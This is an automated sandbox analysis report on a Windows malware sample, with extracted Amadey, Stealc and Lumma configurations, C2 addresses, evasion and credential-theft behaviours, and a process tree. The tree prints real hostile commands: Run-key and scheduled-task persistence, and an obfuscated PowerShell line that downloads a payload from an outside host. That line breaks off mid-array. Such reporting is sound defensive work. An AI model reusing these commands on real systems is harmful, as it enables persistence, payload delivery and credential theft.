Analysis
max time kernel: 34s
max time network: 158s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 06/12/2024, 00:17
Static task: static1
Behavioral task: behavioral1
Sample: 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe
Resource: win7-20240903-en
General
Target: 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe
Size: 1.8MB
MD5: cd86e4c2fbaf81cb17606d69108fff47
SHA1: 97117dadf1a95214ceaf1d1d9337dae317c6a358
SHA256: 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e
SHA512: 42393ee97337b197a176032276b9da8bd3ba26d5e5a36751130271422a9cb0a91d50a22c9f75e4de77083b47d8b6c7f54c5f1ebccd09f97dbba8eb6591554748
SSDEEP: 49152:1hYf1buEc90mDAkzorHA/GJKEmQVhiln:Mf1qEcvDTSNXmQVh6
Malware Config

Extracted
Family: amadey
Version: 4.42
Botnet: 9c9aa5
C2: http://185.215.113.43
install_dir: abc3bc1985
install_file: skotes.exe
strings_key: 8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths: /Zu7JuNko/index.php

Extracted
Family: amadey
Version: 4.41
Botnet: fed3aa
C2: http://185.215.113.16
install_dir: 44111dbc49
install_file: axplong.exe
strings_key: 8d0ad6945b1a30a186ec2d30be6db0b5
url_paths: /Jo89Ku7d/index.php

Extracted
Family: stealc
Botnet: default_valenciga
C2: http://185.215.113.17
url_path: /2fb6c2cc8dce150a.php

Extracted
Family: lumma
Extracted
Family: stealc
Botnet: drum
C2: http://185.215.113.206
url_path: /c4becf79229cb002.php

Extracted
Family: lumma
Signatures
- Amadey family
- Lumma family
- Stealc family

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 8 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | skotes.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 5b2f185e4f.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplong.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | GI59vO6.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | BhD8htX.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 0608197541.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | skotes.exe
Downloads MZ/PE file
Checks BIOS information in registry (2 TTPs, 16 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | GI59vO6.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | BhD8htX.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 0608197541.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplong.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | GI59vO6.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | BhD8htX.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 5b2f185e4f.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplong.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 5b2f185e4f.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 0608197541.exe
Checks computer location settings (2 TTPs, 7 IoCs)
Looks up the country code configured in the registry, likely a geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | axplong.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | AllNew.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | Gxtuum.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | rafencoder32.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | skotes.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | 5b2f185e4f.exe
Executes dropped EXE (22 IoCs)
pid | Process
3320 | skotes.exe
4988 | skotes.exe
740 | 5b2f185e4f.exe
544 | axplong.exe
2024 | stealc_default2.exe
4140 | GI59vO6.exe
4732 | alex2022.exe
1972 | alex2022.exe
4976 | alex2022.exe
2632 | alex2022.exe
3164 | BhD8htX.exe
2844 | 0608197541.exe
3288 | AllNew.exe
1444 | Gxtuum.exe
1732 | i1A5m12.exe
548 | i1A5m12.tmp
2008 | rafencoder.exe
3220 | stail.exe
3300 | stail.tmp
5072 | rafencoder32.exe
1156 | trru7rd2.exe
3180 | wL3EGdM.exe
Identifies Wine through registry keys (2 TTPs, 8 IoCs)
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | GI59vO6.exe
Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | BhD8htX.exe
Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | 0608197541.exe
Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe
Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | skotes.exe
Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | skotes.exe
Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | 5b2f185e4f.exe
Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | axplong.exe
Loads dropped DLL (6 IoCs)
pid | Process
548 | i1A5m12.tmp
2008 | rafencoder.exe
2024 | stealc_default2.exe
2024 | stealc_default2.exe
3300 | stail.tmp
5072 | rafencoder32.exe
Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs like FileZilla.

Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Unsecured Credentials: Credentials In Files (1 TTPs)
Steals credentials from unsecured files.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Command and Scripting Interpreter: PowerShell (2 IoCs)
pid | Process
1116 | powershell.exe
920 | powershell.exe
An obfuscated cmd.exe command-line is typically used to evade detection. (1 IoCs)
pid | Process
2976 | cmd.exe
AutoIT Executable (1 IoCs)
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral2/files/0x000b000000023d1c-7281.dat | autoit_exe
Suspicious use of NtSetInformationThreadHideFromDebugger (8 IoCs)
pid | Process
4128 | 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe
3320 | skotes.exe
4988 | skotes.exe
740 | 5b2f185e4f.exe
544 | axplong.exe
4140 | GI59vO6.exe
3164 | BhD8htX.exe
2844 | 0608197541.exe
Suspicious use of SetThreadContext (1 IoCs)
description | pid | Process | procid_target
PID 4732 set thread context of 2632 | 4732 | alex2022.exe | 106
Drops file in Windows directory (3 IoCs)
description | ioc | Process
File created | C:\Windows\Tasks\axplong.job | 5b2f185e4f.exe
File created | C:\Windows\Tasks\Gxtuum.job | AllNew.exe
File created | C:\Windows\Tasks\skotes.job | 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe
Embeds OpenSSL (1 IoCs)
Embeds OpenSSL, may be used to circumvent TLS interception.
resource | yara_rule
behavioral2/files/0x0007000000023cc7-390.dat | embeds_openssl
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Program crash (10 IoCs)
pid | pid_target | Process | procid_target
3244 | 2844 | WerFault.exe | 110
1860 | 2844 | WerFault.exe | 110
1388 | 2844 | WerFault.exe | 110
5184 | 4140 | WerFault.exe | 98
5192 | 2632 | WerFault.exe | 106
5636 | 3164 | WerFault.exe | 108
740 | 3164 | WerFault.exe | 108
2900 | 5564 | WerFault.exe | 155
5508 | 1196 | WerFault.exe | 159
6448 | 1196 | WerFault.exe | 159
System Location Discovery: System Language Discovery (1 TTPs, 24 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | wL3EGdM.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 5b2f185e4f.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | stealc_default2.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | alex2022.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | alex2022.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | BhD8htX.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | i1A5m12.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | stail.tmp
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | skotes.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | AllNew.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | stail.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rafencoder32.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | trru7rd2.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | axplong.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | GI59vO6.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | i1A5m12.tmp
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 0608197541.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Gxtuum.exe
Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | stealc_default2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | stealc_default2.exe
Kills process with taskkill (6 IoCs)
pid | Process
5176 | taskkill.exe
7164 | taskkill.exe
5484 | taskkill.exe
4468 | taskkill.exe
5824 | taskkill.exe
3284 | taskkill.exe
Runs net.exe
Scheduled Task/Job: Scheduled Task (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
5644 | schtasks.exe
Suspicious behavior: EnumeratesProcesses (36 IoCs)
pid | Process
4128 | 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe
4128 | 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe
3320 | skotes.exe
3320 | skotes.exe
4988 | skotes.exe
4988 | skotes.exe
740 | 5b2f185e4f.exe
740 | 5b2f185e4f.exe
544 | axplong.exe
544 | axplong.exe
4140 | GI59vO6.exe
4140 | GI59vO6.exe
2024 | stealc_default2.exe
2024 | stealc_default2.exe
3164 | BhD8htX.exe
3164 | BhD8htX.exe
2844 | 0608197541.exe
2844 | 0608197541.exe
548 | i1A5m12.tmp
548 | i1A5m12.tmp
2024 | stealc_default2.exe
2024 | stealc_default2.exe
3300 | stail.tmp
3300 | stail.tmp
3300 | stail.tmp
3300 | stail.tmp
3300 | stail.tmp
3300 | stail.tmp
3300 | stail.tmp
3300 | stail.tmp
3300 | stail.tmp
3300 | stail.tmp
3300 | stail.tmp
3300 | stail.tmp
920 | powershell.exe
920 | powershell.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3180 | wL3EGdM.exe
Token: SeDebugPrivilege | 920 | powershell.exe
Suspicious use of FindShellTrayWindow (4 IoCs)
pid | Process
4128 | 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe
740 | 5b2f185e4f.exe
548 | i1A5m12.tmp
3300 | stail.tmp
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
PID 4128 wrote to memory of 3320 | 4128 | 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe | 83
PID 4128 wrote to memory of 3320 | 4128 | 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe | 83
PID 4128 wrote to memory of 3320 | 4128 | 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe | 83
PID 3320 wrote to memory of 740 | 3320 | skotes.exe | 92
PID 3320 wrote to memory of 740 | 3320 | skotes.exe | 92
PID 3320 wrote to memory of 740 | 3320 | skotes.exe | 92
PID 740 wrote to memory of 544 | 740 | 5b2f185e4f.exe | 95
PID 740 wrote to memory of 544 | 740 | 5b2f185e4f.exe | 95
PID 740 wrote to memory of 544 | 740 | 5b2f185e4f.exe | 95
PID 544 wrote to memory of 2024 | 544 | axplong.exe | 96
PID 544 wrote to memory of 2024 | 544 | axplong.exe | 96
PID 544 wrote to memory of 2024 | 544 | axplong.exe | 96
PID 3320 wrote to memory of 4140 | 3320 | skotes.exe | 98
PID 3320 wrote to memory of 4140 | 3320 | skotes.exe | 98
PID 3320 wrote to memory of 4140 | 3320 | skotes.exe | 98
PID 544 wrote to memory of 4732 | 544 | axplong.exe | 102
PID 544 wrote to memory of 4732 | 544 | axplong.exe | 102
PID 544 wrote to memory of 4732 | 544 | axplong.exe | 102
PID 4732 wrote to memory of 1972 | 4732 | alex2022.exe | 104
PID 4732 wrote to memory of 1972 | 4732 | alex2022.exe | 104
PID 4732 wrote to memory of 1972 | 4732 | alex2022.exe | 104
PID 4732 wrote to memory of 4976 | 4732 | alex2022.exe | 105
PID 4732 wrote to memory of 4976 | 4732 | alex2022.exe | 105
PID 4732 wrote to memory of 4976 | 4732 | alex2022.exe | 105
PID 4732 wrote to memory of 2632 | 4732 | alex2022.exe | 106
PID 4732 wrote to memory of 2632 | 4732 | alex2022.exe | 106
PID 4732 wrote to memory of 2632 | 4732 | alex2022.exe | 106
PID 4732 wrote to memory of 2632 | 4732 | alex2022.exe | 106
PID 4732 wrote to memory of 2632 | 4732 | alex2022.exe | 106
PID 4732 wrote to memory of 2632 | 4732 | alex2022.exe | 106
PID 4732 wrote to memory of 2632 | 4732 | alex2022.exe | 106
PID 4732 wrote to memory of 2632 | 4732 | alex2022.exe | 106
PID 4732 wrote to memory of 2632 | 4732 | alex2022.exe | 106
PID 4732 wrote to memory of 2632 | 4732 | alex2022.exe | 106
PID 3320 wrote to memory of 3164 | 3320 | skotes.exe | 108
PID 3320 wrote to memory of 3164 | 3320 | skotes.exe | 108
PID 3320 wrote to memory of 3164 | 3320 | skotes.exe | 108
PID 544 wrote to memory of 2844 | 544 | axplong.exe | 110
PID 544 wrote to memory of 2844 | 544 | axplong.exe | 110
PID 544 wrote to memory of 2844 | 544 | axplong.exe | 110
PID 544 wrote to memory of 3288 | 544 | axplong.exe | 112
PID 544 wrote to memory of 3288 | 544 | axplong.exe | 112
PID 544 wrote to memory of 3288 | 544 | axplong.exe | 112
PID 3288 wrote to memory of 1444 | 3288 | AllNew.exe | 113
PID 3288 wrote to memory of 1444 | 3288 | AllNew.exe | 113
PID 3288 wrote to memory of 1444 | 3288 | AllNew.exe | 113
PID 3320 wrote to memory of 1732 | 3320 | skotes.exe | 120
PID 3320 wrote to memory of 1732 | 3320 | skotes.exe | 120
PID 3320 wrote to memory of 1732 | 3320 | skotes.exe | 120
PID 1732 wrote to memory of 548 | 1732 | i1A5m12.exe | 121
PID 1732 wrote to memory of 548 | 1732 | i1A5m12.exe | 121
PID 1732 wrote to memory of 548 | 1732 | i1A5m12.exe | 121
PID 548 wrote to memory of 1448 | 548 | i1A5m12.tmp | 122
PID 548 wrote to memory of 1448 | 548 | i1A5m12.tmp | 122
PID 548 wrote to memory of 1448 | 548 | i1A5m12.tmp | 122
PID 548 wrote to memory of 2008 | 548 | i1A5m12.tmp | 124
PID 548 wrote to memory of 2008 | 548 | i1A5m12.tmp | 124
PID 548 wrote to memory of 2008 | 548 | i1A5m12.tmp | 124
PID 1448 wrote to memory of 5116 | 1448 | net.exe | 125
PID 1448 wrote to memory of 5116 | 1448 | net.exe | 125
PID 1448 wrote to memory of 5116 | 1448 | net.exe | 125
PID 1444 wrote to memory of 3220 | 1444 | Gxtuum.exe | 129
PID 1444 wrote to memory of 3220 | 1444 | Gxtuum.exe | 129
PID 1444 wrote to memory of 3220 | 1444 | Gxtuum.exe | 129
Processes
(tree depth in brackets; each entry gives the image path, the command line, the matched signatures and the PID)

[1] C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID: 4128
  [2] C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Checks computer location settings
      - Executes dropped EXE
      - Identifies Wine through registry keys
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      PID: 3320
    [3] C:\Users\Admin\AppData\Local\Temp\1011459001\5b2f185e4f.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\1011459001\5b2f185e4f.exe"
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Checks computer location settings
        - Executes dropped EXE
        - Identifies Wine through registry keys
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Drops file in Windows directory
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of WriteProcessMemory
        PID: 740
      [4] C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          cmdline: "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
          - Identifies VirtualBox via ACPI registry values (likely anti-VM)
          - Checks BIOS information in registry
          - Checks computer location settings
          - Executes dropped EXE
          - Identifies Wine through registry keys
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory
          PID: 544
        [5] C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
            - Executes dropped EXE
            - Loads dropped DLL
            - System Location Discovery: System Language Discovery
            - Checks processor information in registry
            - Suspicious behavior: EnumeratesProcesses
            PID: 2024
        [5] C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory
            PID: 4732
          [6] C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
              cmdline: "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
              - Executes dropped EXE
              PID: 1972
          [6] C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
              cmdline: "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
              - Executes dropped EXE
              PID: 4976
          [6] C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
              cmdline: "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              PID: 2632
            [7] C:\Windows\SysWOW64\WerFault.exe
                cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2632 -s 1316
                - Program crash
                PID: 5192
        [5] C:\Users\Admin\AppData\Local\Temp\1002824001\0608197541.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\1002824001\0608197541.exe"
            - Identifies VirtualBox via ACPI registry values (likely anti-VM)
            - Checks BIOS information in registry
            - Executes dropped EXE
            - Identifies Wine through registry keys
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            PID: 2844
          [6] C:\Windows\SysWOW64\WerFault.exe
              cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1484
              - Program crash
              PID: 1860
          [6] C:\Windows\SysWOW64\WerFault.exe
              cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1496
              - Program crash
              PID: 3244
          [6] C:\Windows\SysWOW64\WerFault.exe
              cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1584
              - Program crash
              PID: 1388
        [5] C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"
            - Checks computer location settings
            - Executes dropped EXE
            - Drops file in Windows directory
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory
            PID: 3288
          [6] C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
              cmdline: "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
              - Checks computer location settings
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Suspicious use of WriteProcessMemory
              PID: 1444
            [7] C:\Users\Admin\AppData\Local\Temp\10000351101\stail.exe
                cmdline: "C:\Users\Admin\AppData\Local\Temp\10000351101\stail.exe"
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
                PID: 3220
              [8] C:\Users\Admin\AppData\Local\Temp\is-DD1J2.tmp\stail.tmp
                  cmdline: "C:\Users\Admin\AppData\Local\Temp\is-DD1J2.tmp\stail.tmp" /SL5="$1502B0,4048252,54272,C:\Users\Admin\AppData\Local\Temp\10000351101\stail.exe"
                  - Executes dropped EXE
                  - Loads dropped DLL
                  - System Location Discovery: System Language Discovery
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of FindShellTrayWindow
                  PID: 3300
                [9] C:\Windows\SysWOW64\net.exe
                    cmdline: "C:\Windows\system32\net.exe" pause raf_encoder_1255
                    - System Location Discovery: System Language Discovery
                    PID: 3540
                  [10] C:\Windows\SysWOW64\net1.exe
                      cmdline: C:\Windows\system32\net1 pause raf_encoder_1255
                      - System Location Discovery: System Language Discovery
                      PID: 3844
                [9] C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder32.exe
                    cmdline: "C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder32.exe" -i
                    - Checks computer location settings
                    - Executes dropped EXE
                    - Loads dropped DLL
                    - System Location Discovery: System Language Discovery
                    PID: 5072
                  [10] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "lDBNode55" -Value "C:\ProgramData\DNodedbtable\DNodedbtable.exe"
                      - Command and Scripting Interpreter: PowerShell
                      - System Location Discovery: System Language Discovery
                      - Suspicious behavior: EnumeratesProcesses
                      - Suspicious use of AdjustPrivilegeToken
                      PID: 920
        [5] C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            PID: 1156
        [5] C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"
            PID: 5748
          [6] C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
              cmdline: "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
              PID: 1052
            [7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\10009630142\asyn.ps1"
                - Command and Scripting Interpreter: PowerShell
                PID: 1116
              [8] C:\Windows\SysWOW64\schtasks.exe
                  cmdline: "C:\Windows\system32\schtasks.exe" /create /tn Admin /SC minute /MO 30 /tr "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoLogo -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Admin\10009630142\asyn.ps1"" /F
                  - Scheduled Task/Job: Scheduled Task
                  PID: 5644
              [8] C:\Windows\SysWOW64\cmd.exe (command line as recorded below)
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -NoProfile -NonInteractive -WindowStyle Hidden -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,98,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,115,101,116,53,57,49,50,80,121,89,46,66,109,112,34,13,10,36,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,98,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,36,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,